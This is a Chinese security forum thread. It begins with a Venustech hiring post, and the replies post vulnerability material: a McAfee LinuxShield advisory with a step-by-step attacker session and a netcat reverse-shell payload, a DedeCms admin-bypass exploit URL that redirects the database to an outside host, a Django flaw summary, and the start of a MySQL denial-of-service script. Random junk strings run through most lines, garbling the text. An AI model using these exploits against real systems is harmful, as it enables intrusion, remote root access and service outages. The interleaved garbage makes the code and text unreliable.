最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。! }4 j7 y- p, Z& N6 _4 t

    , Q7 Y- k  s/ Q. q" g  V

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    6 Z  N0 C/ ?% q+ J- F' S安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    ) n5 g, a# y8 q2 S4 Z: h精通C语言编程

    2.
      ?$ }# m8 I4 n0 `. r熟练使用Linux操作系统,精通 Linux下C语言编程

    3.% Z5 W4 B' T7 @4 ~! m4 ?: q  Y. ?
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    - G- T+ \3 k! c: ^! E+ s7 t9 n* ~熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5." s. n4 q8 p8 `+ b! y; m: I$ x
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    5 E9 }6 V3 n, Q! i6 R! i负责产品的系统测试、集成测试工作

    2.! @$ Z% D- |  v0 x6 h/ ?! i) u
    负责产品用例的编写,执行、修改

    3.
    - Z9 o& ~7 [' H5 @  x负责产品性能的测试

    4.
    & [/ F$ ~! @6 B5 {& U- M4 W负责对外项目的支持和测试工作

    岗位要求:

    1.
    & V" a, L0 d* u, f9 j. [掌握基本的tcp/ip知识

    2.
      I2 o- x1 i% p1 b数通基础好

    3.
    2 ~9 L2 l! L7 ^% x对linux有一定的基础

    4.
    % q$ [3 L9 O& b掌握数据库的搭建和使用

    5.
    9 {/ Y! ~/ N8 ]" F  A/ q0 p至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    * j- z% C' o6 }4 c6 h3 d8 m熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.8 P' C1 Q! x. K! B+ ~9 {+ Y
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.2 ^9 o+ p3 T3 }1 \
    对网络安全设备在网络中的部署有一定的认识

    9.' s9 D( r7 b9 |! S  @
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.; M, X8 g* P& ~5 b* |* h
    木&马检测服务、WEB漏洞扫描服务的实施

    2.3 P6 @0 Y( F' }
    对服务客户的技术支持

    3.- E$ a) Q& H/ n6 T
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.7 t& Q$ ]( O# Q/ t- U
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    : ~* k# G. c! \, n& M
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code. u" b; v& ?+ l# t
    影响版本: McAfee LinuxShield <= 1.5.1% C+ d) `( M: Z6 h3 `: J# }
    远程攻击: Yes 2 E; z, Y; z3 S2 V/ ?9 d! @
    本地溢出: Yes
    " c) G: {, O( \" F+ ~背景阅读:7 D6 K5 O7 N( x4 G
    ===========* @- U8 @8 [% _. _9 ]' |
    ) \* S& z9 k6 }: O4 k# a, z# C
    LinuxShield detects and removes viruses and other potentially unwanted
    3 l8 l5 m6 x2 x6 @software on Linux-based systems. LinuxShield uses the powerful McAfee, n% x0 O8 h) C& V  u1 T5 b1 H8 S6 C
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our( h1 [* A  ^# l: q/ z: F
    anti-virus products., j: D; O5 ?  q6 V# [1 G

    ! v! r- }5 k6 M, ZAlthough a few years ago, the Linux operating system was considered a/ v) w% X: Q0 ~6 l/ E) l/ b4 E
    secure environment, it is now seeing more occurrences of software
    . ~+ d( F  @* V) ^1 H- ~. Y7 Lspecifically written to attack or exploit security weaknesses in
    - M- y  O# D' d! p; n+ J4 R2 `Linux-based systems. Increasingly, Linux-based systems interact with( K# d* A) S  u- n3 L) e6 c$ [9 W
    Windows-based computers. Although viruses written to attack Windows-! b0 E2 a8 y$ J: z: C
    based systems do not directly attack Linux systems, a Linux server: @' M1 ~$ L& _0 i7 F2 ]! h
    can harbor these viruses, ready to infect any client that connects to' U+ i$ \- X6 H; o9 D; h
    it.6 }# Y& K: [9 `
    3 W1 H% k% J6 O+ W6 [$ G
    When installed on your Linux systems, LinuxShield provides protection$ ?7 @4 m  M4 o
    against viruses, Trojan horses, and other types of potentially$ }3 y0 O- o- `7 F1 Z
    unwanted software.
    + B, Q4 \6 @! }/ ~1 z& z) G: B9 t) Z
    LinuxShield scans files as they are opened and closed
    ) }' S& f; ~; S1 @+ i% m; C4 X?&amp;#65533;&amp;#65533; a technique
    ' h6 {/ F2 f7 }8 P* _" c( Lknown as on-access scanning. LinuxShield also incorporates an2 f9 ], [: J# ]6 `  l( t6 H
    on-demand scanner that enables you to scan any directory or file in$ o" p; Q9 g4 v/ V
    your host at any time.( M2 P( f: o# u' Q

    + F  \$ X  s8 i" V0 _+ Q7 PWhen kept up-to-date with the latest virus-definition (DAT) files,
    ! [/ D. Z8 y$ d: HLinuxShield is an important part of your network security. We% H8 ]/ H; ?9 z$ U
    recommend that you set up an anti-virus security policy for your3 I7 }# C) m9 w7 g' N
    network, incorporating as many protective measures as possible.
    . l, J7 E. }5 Y6 J  m. y$ L; Y
    " n  ]2 B$ H' A1 RLinuxShield uses a web-browser interface, and a large number of7 Y0 k. l3 k8 O" w$ ^, ]
    LinuxShield installations can be centrally controlled by ePolicy
    . D) r# M7 b, F/ ^/ X- _Orchestrator." }& A& a7 j0 D$ U0 P! i

    * W$ d8 x: L; c9 Q' I(Product description from LinuxShield Product Guide)" e2 j: U. ]) ~; t4 N* B& v/ \4 b

    2 D! C% B$ M7 N2 s5 x
    5 j9 y% B+ f1 t: g' f- }" M4 v; p) N3 Y/ O8 R
    Description:3 v+ g/ T5 }/ `% ~) s7 w
    ============5 E( _' u: w/ o* t# o7 u
    ) E  w  b' B8 _+ R
    This vulnerability allows remote attackers to execute arbitrary code1 l6 i+ B% y& P' @6 T/ K
    on vulnerable installations of McAfee LinuxShield. User interaction
    - F' ~# ^  a  [# j3 x2 F: Fis not required to exploit this vulnerability but an attacker must" v% p( C0 i6 H! s
    be authenticated.# S4 j% B# k, j- |5 {
    3 F, X/ W3 V0 _5 e+ O5 M
    The LinuxShield Webinterface communicates with the localy installed
    ! T5 I$ x" Y' ~1 B! ?$ n"nailsd" daemon, which listens on port 65443/tcp, to do
    + u" ~8 S+ [% S0 yconfiguration7 g, \* b4 @: u5 ?. O
    changes, query the configuration and execute tasks.- x6 e& K! P6 t. o. r4 e5 x) F: V
    ! i, q" q% a6 m
    Each user, which can login to the victim box, can also authenticate# g* j# y, G& @4 [. M- }
    it self to the "nailsd" and can do configuration changes and7 U- x$ S- {9 F. @6 n: k* h
    execute) T3 l6 T! F$ U" I5 c
    tasks with root privileges.
    * j/ c5 y% `& d, _+ P
    , k$ E9 M9 U0 B1 Z/ W, zA direct execution of commands is not possible, but it is possible to
    ) e# ?: b) d2 g$ q5 wdownload and execute code through manipulation of the config and9 p4 C- }/ R1 Z7 n' y! m: M5 l0 Z1 g
    execute schedule tasks of the LinuxShield.
    ' o( I; I3 G, A7 k: D
    - ~/ s, K4 `  x7 b/ t+ b( @' E7 D
    7 _& ?  S. Z+ A3 Iwalk-through (after the TLS handshake):
    5 u4 l( G3 z8 ?0 P, R' W+--------------------------------------
    * f  i% X) U. `& ]- L% a8 f, Y( {1 m( o3 p: |! t1 W
    nailsd > +OK welcome to the NAILS Statistics Service; s4 r  s3 g- Z# Y  D' g5 X
    attacker> auth <user> <pass>* A  P! H* x0 |3 H& c
    nailsd > +OK successful authentication
    8 b0 {. t1 I# d$ ~
    9 ~; L# `, j# C+ ]+ @: V- m1 i# Set the Attacker repository to download our code from a httpd
    . L( u& v3 `5 ~) E+ S6 R# (catalog.z)& o" i3 @3 y! l+ Y0 W& j3 [4 A
    #---------------------------------------------------------------
    8 g4 n/ b6 Z* n' h* R% ]; {attacker> db set 1 _table=repository status=1 siteList=<?xml version
    9 l* K. D: G1 g6 @7 U' w# Y="1.0" encoding="UTF-8"?><ns:SiteLists6 D" }6 u( G" b+ u  Q
    xmlns:ns="naSiteLi
    7 q5 G6 \1 G' Xst" GlobalVersion="20030131003110"7 N6 F8 u$ Y* Q5 J
    LocalVersion="20091209
    2 q$ I; g% M9 F2 C1 a  Z7 ?161903" Type="Client"><SiteList- G4 [# x' S" Z) `# U  R$ f
    Default="1" Name="SomeGU
    / `/ [* e9 o2 [4 hID"><HttpSite Type="repository"7 B& o% V+ k& n8 [
    Name="EvilRepo" Order="1: @5 ~$ R4 r$ R0 f* O( w
    " Server="<attackerhost>:80"
    & ^) K3 U' s3 x; JEnabled="1" Local="1"><Rela( V+ U$ P* X/ P
    4 T5 t( _  J8 k' t% ]! ~8 A
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    0 }+ \1 h7 L3 W1 W$ W& UrName></) U, H2 M2 {5 s7 Q7 ]
    UserName><Password9 p! U. `& I- o7 F. G) D- r
    Encrypted="0"/></HttpSite></SiteList></% B% R8 X+ V2 ~+ \. f) F
    ns:SiteLists> _cmd=update8 M* B8 U; P8 g4 W
    nailsd > +OK database changes buffered.9 t: D/ \. }: W3 b2 V: N

    1 l! `/ V3 C* H* b& I7 B# Execute task to set the attacker repository
    / k3 k9 B5 Z" ^#---------------------------------------------------------------
    . n& X/ Q# e) _1 q( a. N% D. }attacker> task setsitelist( @* r0 n5 R3 B- g6 X
    nailsd > +OK setting sitelist from CMA.5 H$ n1 e3 N+ Y0 I

    8 ~1 H2 R$ l* ^6 j# Execute the default Update task to download the code' W; u( W  M( D% p+ y0 ~; z' R
    #---------------------------------------------------------------* ^" C/ g# ?4 [# E( w7 l" ?& N0 }" y
    attacker> task nstart LinuxShield Update
    ' N$ `1 R, n! Knailsd > +OK task LinuxShield Update starting0 a# P- o9 T# a. H& E# O7 ?2 q8 Y
    * \) Q9 ^* t& F% ]$ t
    # Create a Scan profile, which executes our code. The profiles are
    " r! D+ c9 h& A2 k# not stored in the database.. k3 ?" V7 z- p5 e
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    % x4 ~2 P+ O& }+ K#---------------------------------------------------------------% o9 L/ f& t" {3 D2 H5 w7 f! }
    attacker> sconf ODS_99 begin
    1 H+ {7 D; I9 |5 M" c* B  U& Wnailsd > +OK 1260400888  u6 l0 c6 C: Q' i; B( b& ^5 w+ A

    3 l4 l; c* D5 b' `# Set the variable "nailsd.profile.ODS_99.scannerPath" to the1 A1 y. i0 F$ R' u7 }
    path
    9 Y( B  H& Y6 s' d' W9 Q# where our earlier downloaded catalog.z file is stored.9 c' u6 R0 w* p2 F9 W
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    " s/ g( s0 e/ k3 h( k+ J* p#---------------------------------------------------------------
    ( F, B( V) a/ D- D; jattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    . V+ R& a# t$ w0 t; Jtrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O" r" C6 l# _/ ]( Y& p- U, |
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=# w2 M" D# @& V# I
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    0 \: L. @3 W* V0 Q+ F+ l9 Fine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro0 p$ A0 `& L( I
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD7 a8 K  u& I; E4 _7 I5 j
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en1 o7 [& {3 u! ?* u* q/ i
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    ; L( |4 [3 Z# O) r  ?+ A.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu' z$ z  M3 f3 n# b- a
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru# C* H3 M: e3 e% i2 a9 p
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    1 ~# B9 p3 U  @  M.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    ; ]/ f3 n) b1 h( Z8 vle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    + U9 B1 ?/ Q6 T5 e7 @dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin" v7 h. E- q- @. A6 d- \# ?3 G
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    - |% ^' g5 A$ w  U& M5 i/ v6 Cofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    ( T7 Q# @: S) N9 p1 I" fo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    $ b& w! W. |# W; P.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    " K) ^; g& c: v; p9 K3 X! k! f. Srue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    0 t$ [0 E/ r  x" A% D) @$ ?. l: M' Pch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    & _; ^! X  U* t4 k7 o00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    : M; `) F7 l' A) x/ xODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil% v5 h8 R( H3 e7 B
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    " V  ~+ l; i! K, ^4 Gnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    0 c  K! {" n. w2 u2 H8 pofile.ODS_99.filter.extensions.type=extension nailsd.profil! ?; u9 J0 b$ \: t- Z7 C
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    8 C4 R/ n9 I8 O7 E; }8 t.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    " j6 Z; g! v  V  e  D2 Saction.App.primary=Clean nailsd.profile.ODS_99.action.App.s2 ^) B! s+ h# B5 ^; X
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa0 `9 m- o* \# Y+ L
    ss nailsd.profile.ODS_99.action.error=Block
    * F& O; H1 I  o4 c, Cnailsd > +OK configuration changes buffered% U6 x  w# A7 b
    attacker> sconf ODS_99 commit 12604008881 b2 |. R/ t* {) |7 s. R  M
    nailsd > +OK configuration changes stored
    " p, A0 `2 ]4 u" ~9 s
    1 ~& D7 K) I$ o& x% k7 D3 ]/ k# Set a scan task with the manipulated profile to execute the code
    & y- n- T" W# ]8 b#---------------------------------------------------------------
    & d9 [4 U) V' Q5 e# |; Lattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy; I4 v3 p) p$ _" ~" Q% v" Z
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t* {% d' \4 z# y. w( }8 }& I3 R' P% D
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    6 I) I0 u% T& T; \) E" J_lastRun=1260318482 status=Stopped _cmd=insert  N; T  o+ P& h% v, w$ j
    nailsd > +OK database changes buffered
      H0 P; v1 G" \0 F8 E4 @, Y. f7 d8 E% p& I: u. b* k" Q' X2 U- f+ L
    # Execute scan task to execute the code
    ; K6 f- J- X' K, \; @: T#---------------------------------------------------------------0 v2 H- l0 _8 }: s, w
    attacker> task nstart Evil Task* z0 _  W4 F/ `8 `8 t
    ) g# A# {: z1 l
    +-------------------------------------- walk-through EOF
    + M6 T5 l5 u# T1 z0 V# c5 w2 |, @
    % p, i9 W" Q' r
    4 [/ g, a" a  lTo get a reverse root shell place something like this in the catalog.z; |' A7 A$ g5 c) e  Z
    ( i4 K' v' \- j/ _1 P7 A
    --- snip ---4 K2 t; {4 q1 V, A+ l* Z+ M3 s
    #!/bin/sh$ V$ l  E6 h( E. p+ D
    nc -nv <attacker_host> 4444 -e /bin/sh; @$ g9 \" G, V- I1 B2 |
    --- /snip ---
    ) ?( Q. |. C# u# L6 E4 W1 [+ J- s+ [0 L7 s. @5 v

    . E9 B( B9 @9 w1 x; N* V
    8 V1 a1 n0 z. j  PProof of Concept :
    6 w3 \0 U. C: Y. X! \$ U0 I; _8 T6 N==================5 o" R( l0 `6 M8 Z, G1 D

    ( Q7 A# W+ ?8 Z/ hhttp://inj3ct0r.com/sploits/11165.tar.gz
    , G; q/ y/ M( y1 L- e9 k$ h/ |3 @$ }( P7 V8 k
    4 A$ p" x2 L/ [2 X( O/ e
    % V1 g' @/ i- p8 v7 E
    Solution:7 N6 g4 t1 }9 e) U# t/ }
    =========
    # g4 Q& r- N* o9 i; W$ E3 A: v) y( ]. d5 R7 k8 |1 s" v7 y2 u
    McAfee Advisory( {) Z( {  m  U7 ?- q7 v
    +--------------
    6 ~4 z% X7 d" Nhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007) e7 e! q5 w% E
    6 {- j% W; e  O. `; q

    ' ^9 b5 V) a9 Q2 b& j; |2 ]8 X4 i' O; _7 Q9 r$ m
    Disclosure Timeline (YYYY/MM/DD):6 A, u6 W$ q+ u1 S; n5 v* w2 t
    =================================! d" H6 v7 A5 Y; y( l
    % v$ Y9 o$ c/ ?& z/ y. E* F
    2009.12.07: Vulnerability found
    5 o6 p, x  I- P9 E' Z! l2010.02.03: Asked vendor for a PGP key/ @( `7 E% V4 H
    2010.02.05: Vendor sent his PGP key$ c( o$ P, t8 o2 ]/ i. o
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure  e/ R6 a6 N6 j' U0 t
    date (2010.02.18) to Vendor4 Y9 {' I7 z3 F& D$ l$ x. c- f( X% F
    2010.02.05: Vendor acknowledges the reception of the advisory
    0 {, B9 a' ]- I6 W  W+ H( s2010.02.16: Ask for a status update, because the planned release date is; g' @) N2 Q& [3 r5 s
    2010.02.18.
    4 k) m* n$ U8 v6 y2010.02.16: Vendor response that, they are currently working on a patch4 h% N$ E# {* g" H% D' G+ K
    2010.02.17: Changed release date to 2010.02.25.. B3 R% M* r7 E$ W, j0 f3 z
    2010.02.22: Vendor gives a status update, that they are able to release
    ( ^( {4 H( o; ~7 D5 [the patch on 2010.02.25.- i5 v4 N1 `/ K! l. D- o+ m" W
    2010.02.24: Ask for a list of affected products and the advisory url.
      W5 w! C  C! c- X. h2 H2010.02.24: Vendor sends the list.* H2 P' J& M$ B% C
    2010.03.02: Release of this Advisory. s" G3 |) O- _! a- @
    1 F7 H3 M! L; X9 d
      r: E) ?  j) L% E
    % m& B. m0 J" u4 w- h0 Y+ d) V

    ) J1 ?/ |. u6 a+ T; H7 U0 E% B* X" l5 J+ ~6 }9 T  e

    ( C/ j2 q2 P2 R& D9 U. N: _0 Q* |$ c! {) l# O5 J3 b- t) \

    4 _/ @, x- }$ b5 `
    8 j- a9 v' ^1 |+ T" Q1 a5 ~5 r; I, D

    " o, I; `( _" ?: I4 M# F8 @2 G; C7 o% ~: o2 m8 W
    ' @& e) q; P0 s2 |& x9 e' G. `  m1 u

    ' s& h6 w* L! J1 `0 N  T& c3 _& q/ g

    $ w; ?, ]% A' f: |) p. l" J; {. c- c5 O/ O2 p

    8 x0 I- L* i3 O6 I) u) ]4 t8 k! N
    2 G3 w# C! @  X2 U) R, g, o9 k  h
    9 ~+ {# F5 s* m3 q
    # D6 E+ z3 z. L7 r5 R公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    + I: C8 }2 b4 [: ?
    影响版本:6 b8 M! A- B+ m
    Django 1.2.52 U7 ^$ Q+ {: _0 `
    Django 1.3 beta 1. B) A* }+ n- u* q2 J  l" e: N" P
    Django 1.2.47 Q' |9 c4 w3 ~
    Django 1.2.2
    7 Z/ Z+ L. ^/ {3 _: m+ GDjango 1.2

    5 B) T  _/ r! M* h: j0 D
    漏洞描述:

    6 ~4 H+ z- G1 \7 X
    Django是一款开放源代码的Web应用框架,由Python写成。
    4 r* I  {) _2 `0 l/ J  Q( JDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    ( L9 m7 t% X( D6 ]' V1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。, o' e: W+ U/ X6 o6 u% q( z+ T) [
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。( J1 g" ^3 y+ z
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    ) j# H7 h8 X4 @. U/ B; [" \0 D4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    % K9 t. E: V6 `, `$ P
    细节参考:
    % A" N! b/ [4 v. chttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/0 \$ d# w. M; g
    http://secunia.com/advisories/45939/
    ' u: ?2 _. I6 P( V4 y# W2 r

      _) L# }* R7 ^8 c0 W. z! F: b" o% i8 w& h9 l8 s* v+ x+ Y% {
    7 P. y. \4 j% z
    & w/ ^  z" ]5 C$ G- ?5 T
    7 F8 v9 Y3 N1 c7 C

    % {/ q0 }6 n  B3 E7 @3 X
    " p& |, _! i( B8 T
    1 M! G( C1 W* x8 y% p% m7 j. ~
    " r- V" V5 A, [1 \
      _* q' ?+ e" W/ e- b& E
    8 Q2 B, t, k: @: y5 m- C2 n8 m& e

    7 ?, x- ~" T3 g3 e. e* z- j. s' r) a2 x

    5 s+ u- \2 n. w  e- d* W6 M! `: y+ M0 p. Y: M+ F" }
    : }4 Y/ e) v2 p0 w& d

    8 J: A5 Z8 ]0 c# {8 k" m# b! ^2 l& z+ j) p  Z' S" h
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>3 t' E% L! a) p. E) W

    0 ^5 }& U5 [' h) J; _0 v+ t) Chttp://www.sitedir.com.cn/video/8.swf[/quote], e4 x( i9 M" }; a8 H* {
    3 W6 C9 T, D' E. g) }3 ~

    3 P  C6 `5 Q1 b" r7 x: p
    $ [$ I6 J( n2 F( V1 g8 K9 x; N2 N. o8 z$ e! i  F, y- S
    $ S7 z4 j; v" ]: }9 }

    2 C2 S9 i, {0 s5 S  C
    ) S0 R9 ?5 R# n- e
    9 W) E9 g/ C; K8 |7 C: _# |9 o& U% R
    * h' M+ U- O2 ~' B& q/ r5 ]9 m/ ]4 k
    9 l0 ]) b' R5 z2 H, v! w) \1 q

    ) g% x9 |% K+ L$ W# C8 \# l: A! `0 Z. b5 Y" V
    3 g/ l6 w% P  b/ \: O
    ; w$ O  Q$ ]) a' W- b3 A7 Z3 c% P
    8 n9 l6 a/ e/ B; T) ~8 Z4 [

    ' @  Z  {/ ~% y* G! S. J( \
    ( n% \  \* I$ K7 O公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    # [$ X! s; j/ V: D' B8 l3 U4 I
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    4 U8 ?( d6 @) f  x9 e9 K
    此漏洞的前提是必须得到后台路径才能实现

    ( Z  ?% ?4 ~3 @8 w4 W3 P# h% I* b5 \* N
    官方临时解决办法:
    0 X6 _& D) G6 O0 t) a! ]
    找到include/common.inc.php文件,把:

    # F5 E! U% E' V
        foreach($_REQUEST as $_k=>$_v)
    ) O, R  h" d6 d    {
    : J8 N. H9 c, E" g        var_dump($_k);& H0 F0 a/ Y7 @( \$ M
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
      U, r0 s& K( e0 Z0 R        {
    * [9 j: V* W: H' K            exit('Request var not allow!');
    2 V/ E# e1 A) g: w, n* D        }
    ( v! {" n* d$ X* g    }

    0 [& c- }( ~& c
    换成:
    * A7 v/ s5 S/ K0 m$ p8 U! G, s$ a' \9 x
        //检查和注册外部提交的变量
    . `# n) Y; q: r, T    function CheckRequest(&amp;$val) {% b; d. {& m) U2 T1 Z8 }
            if (is_array($val)) {
    ( c* d0 S) }+ R8 o0 S+ F! @3 E1 R            foreach ($val as $_k=>$_v) {
    5 k7 E* {0 f" N' ]2 a/ r4 C* |: `                CheckRequest($_k);" j0 ~& |& t/ B
                    CheckRequest($val[$_k]);. g# i% w! z7 v
                }
    ) h  ]) X, T" X3 p8 o/ v        } else
    : M) G/ j3 p( W" S/ ^' E+ b        {
    ( m8 t8 B0 p( ~" s* J0 o5 ?. A3 I+ F            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )* B, F9 v7 e0 E, a6 t* n
                {7 T6 e% A% i" w# Z& j! t9 s
                    exit('Request var not allow!');
      \$ w" q5 Y& k8 l3 M- q            }
    4 w2 i7 B5 H7 s% W1 R! s" R5 T$ e        }$ I5 x, r. L$ _7 r% e* {" m
        }
    6 J6 D9 i1 o# P3 ], D    CheckRequest($_REQUEST);
    0 e! O3 W" ^; G' V: N

    , W. c5 ~' h6 ]+ q, P+ @( X0 @. s% l7 T

    1 W! A" L$ s5 d0 ]  g
    1 X+ a& l0 y7 _1 e* ]8 L, b$ p# c- ~# D5 R, h5 |/ P* B

    $ Q: h7 a  W1 c9 `8 [' G% r3 H/ B! b+ C, L: J

    0 t  c. `) P: ?( F8 \0 k" T
    ; |& K) i6 c9 }4 X3 j
    % @% ^$ J, {, }. f& c* @
    # G5 n) {6 c8 `8 _$ L) f2 g! b/ Z# f  Z/ J, x/ C

    + l, R! H% w. J+ ]. P( c+ c) F5 Z3 K' `% G! p8 D  Z

    9 [% v2 n5 R# C2 B+ N. t! t5 ?0 z6 _8 M$ ]# d

    9 B) {/ b8 K8 {) s4 I' _6 h9 n5 T$ \6 K& e' q+ S2 x- l

    + |( W3 g) @; ~1 \. K* A9 B' s* K公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机

    7 c5 E1 R* a1 z) B1 @$ b# I  v& thttp://www.sitedir.com.cn/video/4.swf
      J) C3 `7 w; H  f
    ! f& p, Q0 F; S5 S1 m4 G/ {9 G
    + m5 Q7 R/ c% n' w
    , \& y" ]7 R" s& U
    & D+ T# _; `% i# z# [% m# ~

    ' x! B, _0 M8 B' X5 s4 ~4 F* F1 [$ x. L5 H3 S( L: [

      ?, G6 {. v, \+ q+ z3 {6 ]6 R; g$ u" N$ t; B

      i3 I2 P/ C. h& g1 v9 t6 s
    6 J! I- o) c  A8 u0 F
    - K' ?1 r  B& v' a4 W6 {
    ; R. T3 u1 p2 A  E  o9 O) K* B- P

    , D1 N0 z7 j& L4 g4 t- h7 \) f* k
    3 v' x# [( o* ?  o: P$ s1 @

    - I) v7 I" G+ V* [: o) `7 V公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys& Z" w0 j# V1 h  j. o1 I

    5 o* T) u7 N1 h- v7 M. Hprint "4 M$ {" e* U. \7 J$ e
    "5 P: r2 E& N2 O1 f, ^! l4 p, V, N
    print "----------------------------------------------------------------"
    8 K3 ]# H% f+ o1 Yprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
    % Z1 S5 D: ^8 Yprint "| Level Smash the Stack                                         |"* ]/ f4 l% g  v% I! ^5 @
    print "----------------------------------------------------------------"5 e# R! B  I+ R3 u. c+ d& m
    print "
    ! e" B. N+ |. W, k( q0 L- R"; }7 w' l. F2 Y# F) Q- M& G
    ! v3 }0 e- P7 `7 ]! ~7 S4 @6 v
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    $ `/ t+ y& [& V. y"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    , i* P$ ^! a' y7 Q+ Z3 e 1 _  j9 e8 k+ v+ L/ \/ P/ `
